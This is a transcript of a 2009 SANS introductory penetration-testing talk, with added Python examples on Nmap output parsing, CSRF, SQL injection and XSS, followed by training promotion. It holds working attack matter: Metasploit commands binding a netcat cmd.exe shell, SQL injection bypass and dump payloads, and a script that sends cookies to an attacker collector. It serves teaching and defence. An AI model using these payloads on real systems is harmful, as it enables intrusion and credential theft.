Penetration Testing Basics


A 45 minute presentation originally presented at the SANS COINS event in Regina, SK in March of 2009

1. Penetration Testing Basics
   A presentation of The Internet Storm Center, The SANS Institute and The GIAC Certification Program

2. About Me
   Rick Wanner, B.Sc., I.S.P.
   - Client Technology Manager, Security at SaskTel
   - Areas of expertise
     - Secure network architecture, penetration testing
     - IDS, policy development and compliance
   - Masters student at STI (SANS Technology Institute)
   - Handler at the Internet Storm Center
   - Independent contractor/volunteer with SANS/GIAC
   - [email_address]

3. Presentation Overview
   - Internet Storm Center
   - SANS/GIAC mini-briefing
   - Security mitigation strategies
     - Penetration testing

4. The Internet Storm Center
   - The Internet Storm Center acts as a distributed early warning system for the Internet.
   - The ISC acts as an intermediary with ISPs worldwide.
   - The ISC is composed of approximately 40 volunteer handlers who coordinate a group of volunteer intrusion analysts and malware specialists.
   - Daily blog/diary published at
   - Sponsored by the SANS Institute.

5. We want your logs!
   - The ISC's principal inputs come from and Internet users.
   - All logs are scrubbed before they are submitted.

6. SANS Training and GIAC Certifications
   - The SANS Institute is the leading training organization for system administration, audit, network, security and security management.
   - GIAC, the Global Information Assurance Certification program, provides assurance that a certified individual meets a minimum level of ability and possesses the skills necessary to do the job.

7. Today's Cyber Threats
   - Cyber threats have certainly changed since Al Gore invented the internet.
   - What started as a research network (ARPANET) funded by the U.S. Department of Defense is now a significant vehicle for conducting business, shopping, banking, research, communication and the storage of vital corporate information.
   - Unfortunately it is also a haven for hackers and malicious code.

8. The Internet
   - The Internet is a community of individuals with its good neighbourhoods and bad neighbourhoods.
   - In this community the bad neighbourhoods are separated from the good ones by at most about 150 milliseconds.

9. The Need for Information Security
   - While you are working hard to protect your organization's critical information and systems, there are others out there who want to compromise it.
   - Learning the appropriate actions to secure this information benefits not only your employer, clients and stockholders; it benefits you.
   - In this industry, you don't want to be the one who learned the hard way.

10. Security Outlook
   - As users get more sophisticated, so do the bad guys.
   - A CA, Inc. report issued on January 29, 2007 stated that in 2006 trojans accounted for 62% of all malware; worms 24%; and viruses and other types of malware the remaining 13%.
   - CA, Inc. predicts that attackers will use blended threats to steal private information and perpetrate other attacks:
     - Phishers are getting smarter
     - Spam will increase
     - Targeted attacks will increase
     - A rise in the use of kernel rootkits
     - Increased exploitation of browser and application vulnerabilities
     - Typo-squatting on search engines will increase
     - Attacks are increasingly sophisticated

11. Penetration Testing
   - Penetration testing is discovering vulnerabilities in your networks, systems, applications and data before the bad guys do.
   - Penetration testing simulates the generalized attack methodology.

12. Generalized Attack Methodology
   - Reconnaissance
   - Scanning
   - Gaining access
   - Maintaining access
   - Covering tracks

13. Penetration Testing Method
   - Preparation
   - Reconnaissance
   - Scanning
   - Exploitation
   - Analysis
   - Reporting

14. Preparation
   - Define the parameters of the test:
     - Objectives
     - Scope
     - Roles and responsibilities
     - Limitations
     - Success factors
     - Timeline
     - Documented permission (written authorization from the system owner, obtained before any testing starts)

15. Reconnaissance
   - Reconnaissance answers the question "What can a potential attacker learn about your company?"
   - Uses publicly available information.

16. Reconnaissance (2)
   - Some sources of information:
     - Search engines
     - Websites
     - Registrars (WHOIS and DNS records)
     - SEC (public company filings)
     - Recruiting sites (job postings reveal the technologies in use)
     -

17. Reconnaissance (3) - Netcraft

18. Reconnaissance (4) - Netcraft

19. Scanning
   - Now we know where to look, let's dig in a little deeper.
   - Generally you will use two types of scanner: port scanners and vulnerability scanners.
   - The hacker's choice:
     - Nmap
     - Nessus

20. Nmap
   - Nmap: open source port scanner.
   - Usually start with discovery scans and progress to targeted scans.
   - Runs on Windows and *nix.
   - Available from

21. Nmap Book

22. Nmap - Reconnaissance
   List scan (-sL): enumerates the targets and does reverse DNS lookups on each address without sending any probes to the targets themselves.
   - nmap -sL <Address>
   - nmap -sL
   - nmap -sL

23. Nmap - Discovery
   Fast scan (-F) checks a reduced set of the most commonly used ports; --top-ports N checks the N most common ports.
   - nmap -F <Address>
   - nmap -F
   - nmap --top-ports 20 <address>
   - nmap --top-ports 20

24. Nmap - Targeted
   -A enables OS detection, version detection, script scanning and traceroute against the hosts that discovery found.
   - nmap -F -A <address>
   - nmap -F -A
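Discovery scans feed targeted scans, and in practice that hand-off is done by parsing Nmap's greppable output (-oG) rather than by reading the screen. The following is an added example, not code from the slides or from the Nmap project: it parses a constructed sample of `nmap -F -oG -` output (RFC 5737 documentation addresses and made-up host names, not a real scan), keeps the hosts that are up and have at least one open port, and builds the per-host targeted command, narrowed with -p to the ports discovery found open instead of rescanning with -F.

```python
"""Parse nmap greppable (-oG) output from a discovery scan and build the
target list for the follow-up targeted scan.

Added example for this page; not code from the original slides or from
the Nmap project. SAMPLE_OG is constructed to look like the output of
`nmap -F -oG - 192.0.2.0/29` (documentation addresses, not a real scan).
"""
import re
from collections import defaultdict

# Constructed sample of nmap greppable output (not a real scan).
SAMPLE_OG = """\
# Nmap 4.76 scan initiated Tue Mar 10 20:01:11 2009 as: nmap -F -oG - 192.0.2.0/29
Host: 192.0.2.1 (gw.example.test)\tStatus: Up
Host: 192.0.2.1 (gw.example.test)\tPorts: 22/open/tcp//ssh///, 80/open/tcp//http///, 443/closed/tcp//https///\tIgnored State: filtered (97)
Host: 192.0.2.2 ()\tStatus: Up
Host: 192.0.2.2 ()\tPorts: 135/open/tcp//msrpc///, 139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds///\tIgnored State: closed (97)
Host: 192.0.2.3 (printer.example.test)\tStatus: Up
Host: 192.0.2.3 (printer.example.test)\tPorts: 9100/filtered/tcp//jetdirect///\tIgnored State: closed (99)
Host: 192.0.2.4 ()\tStatus: Down
# Nmap done at Tue Mar 10 20:01:40 2009 -- 8 IP addresses (4 hosts up) scanned in 29.12 seconds
"""

# "Host: <ip> (<name>)<TAB>Status: ..." or "...<TAB>Ports: ..."
HOST_RE = re.compile(r"^Host:\s+(\S+)\s+\(([^)]*)\)\t(.*)$")
# Each port entry is port/state/proto/owner/service/rpcinfo/version/
# (state may be "open|filtered", hence the | in the class).
PORT_RE = re.compile(r"(\d+)/([\w|]+)/(\w+)//([^/]*)/")


def parse_greppable(text):
    """Return {ip: {"hostname": str, "ports": [(port, state, proto, service)]}}
    for every host reported as up. Hosts that are down are dropped."""
    hosts = defaultdict(lambda: {"hostname": "", "ports": []})
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if not m:
            continue  # "# Nmap ..." comment lines and anything unexpected
        ip, name, rest = m.groups()
        if rest.startswith("Status: Down"):
            continue
        entry = hosts[ip]
        entry["hostname"] = name
        if rest.startswith("Ports:"):
            ports_field = rest.split("\t")[0][len("Ports:"):]
            for p in PORT_RE.finditer(ports_field):
                port, state, proto, service = p.groups()
                entry["ports"].append((int(port), state, proto, service))
    return dict(hosts)


def targets_with_open_ports(hosts):
    """Hosts worth a targeted scan: at least one port in state 'open'."""
    return sorted(ip for ip, h in hosts.items()
                  if any(state == "open" for _, state, _, _ in h["ports"]))


def targeted_scan_commands(hosts):
    """One 'nmap -A' command per host, limited to the ports found open."""
    cmds = []
    for ip in targets_with_open_ports(hosts):
        open_ports = sorted(p for p, s, _, _ in hosts[ip]["ports"] if s == "open")
        port_arg = ",".join(str(p) for p in open_ports)
        cmds.append(f"nmap -A -p {port_arg} {ip}")
    return cmds


if __name__ == "__main__":
    for cmd in targeted_scan_commands(parse_greppable(SAMPLE_OG)):
        print(cmd)
```

The printer (192.0.2.3) shows only a filtered port and is left out of the targeted list; the host that is down never makes it into the table at all.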
25. Vulnerability Scanner
   - Nessus: vulnerability assessment (VA) scanner. Free to download, but no longer open source (closed source since Nessus 3).
   - The professional vulnerability plugin feed costs money.

26. Commercial Vulnerability Scanners
   - Rapid7 NeXpose
   - GFI LANguard
   - eEye Retina Network

27. Application Attacks
   - Now we have all these layers of protection. Are you still vulnerable?
   - The fact is that you can't deny what you must permit: the firewall has to let traffic through to the web application, so the application itself is exposed.
   - What about application level attacks?

28. Cross-Site Scripting (XSS)
   - Allows a malicious web user to inject script into web pages viewed by other users.
   - Root cause: untrusted input is placed into the page without validation and without output encoding for the HTML context it lands in.
   - Permits the attacker to execute arbitrary script in the victim's browser, in the security context of the vulnerable site (so it can read that site's cookies and act as the user).
29. Yahoo's HotJobs site vulnerable to cross-site scripting attack
   Dan Kaplan - October 27 2008
   Internet research firm Netcraft's toolbar has detected a cross-site scripting bug in Yahoo that could be exploited to steal authentication cookies. The flaw resides on Yahoo's HotJobs search engine site, on which hackers embedded malicious JavaScript code, Netcraft's Paul Mutton said in a blog post on Sunday. "The script steals the authentication cookies that are sent for the domain and passes them to a different website in the United States, where the attacker is harvesting stolen authentication details," Mutton wrote. The pilfered credentials could enable the attackers access to the victims' Yahoo accounts, including email. This vulnerability is similar to another bug that affected Yahoo earlier this year, he said. "Simply visiting the malign URLs on can be enough for a victim to fall prey to the attacker, letting him steal the necessary session cookies to gain access to the victim's email — the victim does not even have to type in their username and password for the attacker to do this," Mutton wrote. "Both attacks send the victim to a blank webpage, leaving them unlikely to realize that their own account has just been compromised."
30. Cross-Site Request Forgery (XSRF)
   - Unauthorized commands are transmitted to a website from a user the website trusts.
   - Exploits an existing authenticated web session: the browser attaches the victim's session cookie to the forged request automatically.
   - Embedded code (a form, image tag or script on a page the attacker controls) causes the unauthorized action.
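To see why the session cookie alone cannot prove the user intended a request, here is an added example (not from the slides; the request, session and form are plain dicts standing in for a web framework) that runs a forged transfer against a handler that checks only the session, then against one that also requires a per-session synchronizer token, the standard defence. The route name, the user names and the attacker page are hypothetical.

```python
"""Cross-site request forgery: a request carrying a valid session cookie
is not proof the user intended it, and the synchronizer-token check that
stops the forgery.

Added example for this page; not code from the original slides. Requests,
sessions and forms are plain dicts standing in for a web framework.
"""
import hmac
import secrets

SESSIONS = {}  # session_id -> {"user": ..., "csrf_token": ...} (in-memory stand-in)


def login(user):
    """Create a session and bind a fresh random CSRF token to it."""
    sid = secrets.token_urlsafe(16)
    SESSIONS[sid] = {"user": user, "csrf_token": secrets.token_urlsafe(32)}
    return sid


def render_transfer_form(sid):
    """The legitimate site embeds the per-session token in its own form."""
    token = SESSIONS[sid]["csrf_token"]
    return ('<form method="POST" action="/transfer">'
            f'<input type="hidden" name="csrf_token" value="{token}">'
            '<input name="to"><input name="amount"><input type="submit"></form>')


def transfer_vulnerable(request):
    """Checks only the session cookie, so a forged cross-site POST passes."""
    session = SESSIONS.get(request["cookies"].get("sid"))
    if session is None:
        return 401, "not logged in"
    return 200, f"{session['user']} sent {request['form']['amount']} to {request['form']['to']}"


def transfer_hardened(request):
    """Also requires the token only the site's own page could have embedded;
    an attacker's page cannot read it because of the same-origin policy."""
    session = SESSIONS.get(request["cookies"].get("sid"))
    if session is None:
        return 401, "not logged in"
    supplied = request["form"].get("csrf_token", "")
    # Constant-time compare so the token cannot be guessed byte by byte.
    if not hmac.compare_digest(supplied, session["csrf_token"]):
        return 403, "CSRF token missing or invalid"
    return 200, f"{session['user']} sent {request['form']['amount']} to {request['form']['to']}"


def forged_request(sid):
    """What the browser sends when the victim visits an attacker page that
    auto-submits a hidden form to the bank: the bank's cookie is attached
    automatically, the token is not (the attacker never saw it)."""
    return {"cookies": {"sid": sid},
            "form": {"to": "attacker", "amount": "1000"}}


def legitimate_request(sid):
    """Submission of the bank's own form, token included."""
    return {"cookies": {"sid": sid},
            "form": {"to": "landlord", "amount": "800",
                     "csrf_token": SESSIONS[sid]["csrf_token"]}}


if __name__ == "__main__":
    sid = login("alice")
    print(transfer_vulnerable(forged_request(sid)))    # 200: the forgery succeeds
    print(transfer_hardened(forged_request(sid)))      # 403: rejected
    print(transfer_hardened(legitimate_request(sid)))  # 200: the real user still works
```

The token must be unpredictable and tied to the session; a token that is constant across users, or one the attacker can read from a response, defeats the check.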
31. SQL Injection
   - SQL syntax is supplied in user input; if the application concatenates that input into a query, the database executes it as part of the statement. Testers probe for this by injecting SQL fragments and watching for a change in the response (an error, or a different result).
   - Results
     - Authentication bypass
     - Unauthorized data access
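An added example (not from the slides) of both results above against a constructed SQLite users table: a login check that concatenates the username into the query is bypassed with `admin' -- ` and made to dump every stored hash with a UNION, while the same check written with bound parameters treats the identical input as a literal string. The table contents and passwords are made up.

```python
"""SQL injection against a login check: the vulnerable query, the
authentication-bypass and data-dump inputs, and the parameterized fix.

Added example for this page; not code from the original slides. Uses an
in-memory SQLite database with a constructed users table.
"""
import hashlib
import sqlite3


def make_db():
    """Constructed users table; passwords are made up."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, pw_hash TEXT)")
    for user, pw in (("admin", "Sup3rS3cret!"), ("rick", "hunter2")):
        conn.execute("INSERT INTO users VALUES (?, ?)",
                     (user, hashlib.sha256(pw.encode()).hexdigest()))
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """Builds the query by string concatenation, so user input becomes SQL."""
    pw_hash = hashlib.sha256(password.encode()).hexdigest()
    query = ("SELECT username FROM users WHERE username = '" + username +
             "' AND pw_hash = '" + pw_hash + "'")
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_hardened(conn, username, password):
    """Parameterized query: input is bound as data and never parsed as SQL."""
    pw_hash = hashlib.sha256(password.encode()).hexdigest()
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND pw_hash = ?",
        (username, pw_hash)).fetchone()
    return row[0] if row else None


# Authentication bypass: close the string, then comment out the password
# check ("--" starts a line comment in SQLite).  The classic
# "' OR '1'='1" variant works the same way.
BYPASS_USERNAME = "admin' -- "
# Unauthorized data access: a UNION pulls every stored hash out through
# the same single-column query.
DUMP_USERNAME = "x' UNION SELECT username || ':' || pw_hash FROM users -- "


def dump_all_vulnerable(conn):
    """Every row the UNION returns through the vulnerable login query."""
    pw_hash = hashlib.sha256(b"irrelevant").hexdigest()
    query = ("SELECT username FROM users WHERE username = '" + DUMP_USERNAME +
             "' AND pw_hash = '" + pw_hash + "'")
    return [r[0] for r in conn.execute(query).fetchall()]


if __name__ == "__main__":
    db = make_db()
    print(login_vulnerable(db, BYPASS_USERNAME, "wrong"))  # 'admin', no password needed
    print(login_hardened(db, BYPASS_USERNAME, "wrong"))    # None
    print(dump_all_vulnerable(db))                          # both users' hashes
```

Note that hashing the password does nothing for injection: the attacker controls the username string, and the hashed password is simply commented away.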
32. Preventing Web Application Attacks
   - Every input should be validated!
   - "Suspicion Breeds Confidence"
     - Test it!
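An added example (not from the slides) for slides 28 and 32: a search page that reflects the query unencoded, the corrected version that HTML-encodes every untrusted value at output time, and the probe check a tester runs to confirm whether a marker payload comes back as live markup. The template, the probe marker and the collector URL in the cookie-theft payload (the technique from the HotJobs story above) are made up for illustration.

```python
"""Reflected cross-site scripting in a search page: the vulnerable render,
the fix (HTML-encode untrusted data at output), and a probe check of the
kind a scanner uses to confirm the reflection.

Added example for this page; not code from the original slides. The page
template, probe marker and collector URL are constructed for illustration.
"""
import html
import re


def render_results_vulnerable(query, hits):
    """Drops the user's search string straight into the page."""
    items = "".join(f"<li>{h}</li>" for h in hits)
    return f"<p>Results for <b>{query}</b>:</p><ul>{items}</ul>"


def render_results_hardened(query, hits):
    """Encodes every untrusted value for the HTML context it lands in.
    quote=True also encodes ' and " so the value is safe in attributes."""
    items = "".join(f"<li>{html.escape(h, quote=True)}</li>" for h in hits)
    return (f"<p>Results for <b>{html.escape(query, quote=True)}</b>:</p>"
            f"<ul>{items}</ul>")


# Probe carrying a unique marker so the check cannot false-positive on the
# page's own script tags.
PROBE = '<script>alert("xss-7f3a")</script>'
SCRIPT_RE = re.compile(r"<script[^>]*>.*?xss-7f3a.*?</script>", re.I | re.S)


def reflects_unencoded(render):
    """True when the probe comes back as live markup rather than as text."""
    page = render(PROBE, ["no matches"])
    return SCRIPT_RE.search(page) is not None


def cookie_theft_payload(collector):
    """What the HotJobs attack did once script execution was possible: ship
    the victim's cookies to a server the attacker controls. `collector` is
    a hypothetical attacker URL."""
    return (f'<script>new Image().src="{collector}?c="'
            '+encodeURIComponent(document.cookie)</script>')


if __name__ == "__main__":
    print("vulnerable reflects script:", reflects_unencoded(render_results_vulnerable))
    print("hardened reflects script:  ", reflects_unencoded(render_results_hardened))
    print(render_results_hardened(PROBE, []))
```

Input validation alone is not enough here: a name like O'Brien is valid input and still has to be encoded on output, which is why the fix sits in the renderer rather than in a filter on the way in.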
33. Nikto
   - Open source web server scanner, written in Perl (commonly run on Linux).
   - Available at

34. Nikto (2)
   - Basic scan
     - perl -h <host>
     - perl -h
   - Multiple ports
     - perl -h -p 80,88,443

35. Nikto - Simple Scan
   [root@rwanner nikto]# ./ -h localhost
   - Nikto v2.03/2.04
   ---------------------------------------------------------------------------
   + Target IP:
   + Target Hostname: localhost
   + Target Port: 80
   + Start Time: 2008-10-27 21:53:47
   ---------------------------------------------------------------------------
   + Server: Apache/2.2.6 (Fedora)
   - Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
   + OSVDB-877: HTTP method ('Allow' Header): 'TRACE' is typically only used for debugging and should be disabled. This message does not mean it is vulnerable to XST.
   + Apache/2.2.6 appears to be outdated (current is at least Apache/2.2.9). Apache 1.3.39 and 2.0.61 are also current.
   + OSVDB-682: GET /usage/ : Webalizer may be installed. Versions lower than 2.01-09 vulnerable to Cross Site Scripting (XSS).
   + OSVDB-877: TRACE / : TRACE option appears to allow XSS or credential theft. See for details
   + OSVDB-3092: GET /manual/ : Web server manual found.
   + OSVDB-3268: GET /icons/ : Directory indexing is enabled: /icons
   + OSVDB-3268: GET /manual/images/ : Directory indexing is enabled: /manual/images
   + OSVDB-3233: GET /icons/README : Apache default file found.
   + 3577 items checked: 9 item(s) reported on remote host
   + End Time: 2008-10-27 21:54:28 (41 seconds)

36. Nikto (3)
   - Multiple hosts
     - perl -h <filename>
     - perl -h hosts.txt
   - Hosts file (one target per line, optionally followed by a comma and a port)
     -
     -
     - ,443

37. Nikto - Multiple Hosts Scan
   ]# ./ -h hosts.txt
   - Nikto v2.03/2.04
   ---------------------------------------------------------------------------
   + Target IP:
   + Target Hostname:
   + Target Port: 443
   ---------------------------------------------------------------------------
   + SSL Info: Ciphers: DES-CBC3-SHA
     Info: /C=US/ST=California/L=Irvine/O=Cisco-Linksys, LLC/OU=Division/CN=Linksys/
     Subject: /C=US/ST=California/L=Irvine/O=Cisco-Linksys, LLC/OU=Division/CN=Linksys/
   + Start Time: 2008-10-28 21:16:37
   ---------------------------------------------------------------------------
   + Server: No banner retrieved

38. Commercial Web Scanners
   - IBM Rational AppScan
   - HP WebInspect
   - Cenzic Hailstorm

39. Exploitation
   - Once you identify a potential vulnerability you have choices:
     - Use individual exploits, available via the Internet
     - Use a pre-built exploitation framework
   - The most popular exploitation framework is Metasploit.
     - Available for Windows or Linux
     - Available at

40. Metasploit
   - 3 primary components
     - Exploit: the code that triggers the vulnerability
       - Stack/heap based buffer overflow
       - Insecure coding
       - PHP vulnerability, IIS Unicode, SQL injection, etc.
     - NOP sled (optional, exploit dependent)
     - Payload: what runs once the exploit succeeds
       - Shellcode
       - Encoders
       - Other (exploit dependent)

41. Metasploit
   # ./msfconsole                              (start Metasploit)
   msf > use windows/dcerpc/ms03_026_dcom
   msf > setg PAYLOAD windows/exec
   msf > setg CMD nc -L -p 80 -e cmd.exe
   msf > setg RHOST
   msf > exploit
   (The windows/exec payload runs the command in CMD on the target; nc -L -p 80 -e cmd.exe binds a command shell to TCP port 80, the one inbound port the demo firewall permits.)

42. Exploitation Demo
   - Patching and configuration
     - Lacking patch management procedures
     - Single inbound port open through firewall
   - Results
     - Simple remote exploitation
     - Worm characteristics
     - Can be used to bypass firewalls

43. Commercial Tools
   - Core Impact

44. Analysis
   - When you finish you will have a mountain of data to analyze.
   - Break it down using a risk based approach: rate each finding by likelihood of exploitation and impact on the business, not by the number of scanner hits.

45. Reporting
   - Base your report on risk.
   - Write it so your senior executives can understand it.
   - Provide recommendations based on standards or best practices.
   - Keep the executive summary short.
   - Stay away from FUD!

46. Presentation Summary
   - Support the Internet Storm Center (ISC)
   - SANS is the best!
   - Test your servers and applications... before the bad guys do!

47. Special Tuition Offer
   Because you attended this session, we are offering you a 10% discount on tuition for our upcoming Critical Infrastructure course in Calgary.

48. COMMUNITY SANS
   - For details on this special offer, please contact for further information.

49. Community SANS in Calgary
   - Critical Infrastructure Protection in CALGARY
   - Monday, June 15, 2009 – Wednesday, June 17, 2009
   - Please use discount code COINS10 (10% discount)

50. COMMUNITY SANS in REGINA
   - We are coming back to Regina again next month!
   - April 6-8, 2009
   - Regina Inn – Hotel & Conference Centre
   - Security 557 - "Virtualization Security and Operations"

51. One CPE Credit
   - You will receive one CPE credit for attending this evening.

52. THANK YOU!
   - This evening was brought to you on behalf of our COMMUNITY OF INTEREST IN NETWORK SECURITY (COINS) program.
   - Thank you for joining us tonight!

53. SANS/GIAC Overview

54. SANS Training and GIAC Certifications
   - The SANS Institute is the leading training organization for system, audit, network and security.
   - GIAC, the Global Information Assurance Certification program, provides assurance that a certified individual meets a minimum level of ability and possesses the skills necessary to do the job.

55. SANS and GIAC Guiding Principles
   - Education
     - Current, evolving and proven material
     - Certifications that prove you have the knowledge and skills to get the job done
   - Hands-on
     - Hands-on training conducted by instructors who are experts in their fields
     - Testing process that evaluates hands-on capabilities
   - Community
     - Listening to and learning the community's needs
     - Giving vital knowledge back to the community

56. How SANS and GIAC Are Different From Other Training/Certifications
   - SANS and GIAC constantly update course and certification content to keep you on top of current threats and vulnerabilities.
   - We use real-world, hands-on scenarios.
   - While tools are an important part of IT security, we teach and validate actual skills, so you don't have to rely solely on the performance of a tool.
   - The SANS Promise: you will be able to apply our information security training the day you get back to the office.

57. GIAC Certification
   - GIAC Silver certifications: multiple choice exams only
   - GIAC Gold certifications: Silver plus a written technical report
   - GIAC Platinum series: highest certification level

58. Top 3 Reasons to Earn Your GIAC Certification
   - Hiring managers use GIAC certifications to ensure that candidates actually possess deep technical skills
   - GIAC certifications help IT security professionals get promoted faster and earn more money
   - GIAC certification reinforces and affirms the hands-on knowledge you possess

59. What Certified People Say
   - "The GIAC certification has enabled me to take the next step in my Information Security career. It allowed me to prove that my value was more than just that of a security minded Sys Admin."
     J. Klein, Enterprise Information Systems, Cedars-Sinai Medical Center
   - "The SANS hands-on experience and the intensive GIAC certification process has garnered me the respect of my boss and peers. Now, when I speak, people listen. I have the confidence to get the job done. My boss looks at me with respect that simply wasn't there before SANS training and GIAC certification. Not only my boss, but managers and peers at other large organizations."
     Matt Carpenter, Enterprise Information Systems
   - GIAC certifications help IT security professionals get promoted faster and earn more money...

60. GIAC Certifications
   - GSEC - Security Essentials
   - GCFW - Firewall Analyst
   - GCIA - Intrusion Analyst
   - GCIH - Incident Handler
   - GCFA - Forensics Analyst
   - GCUX - Unix Security
   - GCWN - Windows Security
   - GNET - .NET
   - GSOC - Securing Oracle
   - GSSP-JAVA - Secure Coding
   - GSSP-C - Secure Coding
   - GISF - Information Security Fundamentals
   - GSAE - Security Audit Essentials
   - GSLC - Security Leadership
   - GSNA - System & Network Auditor
   - G7799 - ISO 17799/27001
   - GISP - Information Security Professional
   - GCIM - Incident Manager
   - GAWN - Auditing Wireless Networks
   - GREM - Reverse-Engineering Malware
   - GPEN - Penetration Tester
   - GCPM - IT Project Management
   For a complete list of GIAC Certifications

61. Free Resources
   - SANS and GIAC have a variety of free resources readily available at and
   - Here's a sample of what we offer:
     - Internet Storm Center
     - SANS Reading Room -
     - Top 15 Malicious Spyware Actions
     - SANS Security Policy Samples
     - The Internet Guide to Popular Resources on Information Security
     - FAQs
     - SCORE
     - Security Tool White Papers and GIAC Gold Papers
     - Glossary of Security Terms

62. Thank You!
   Questions: [email_address] [email_address]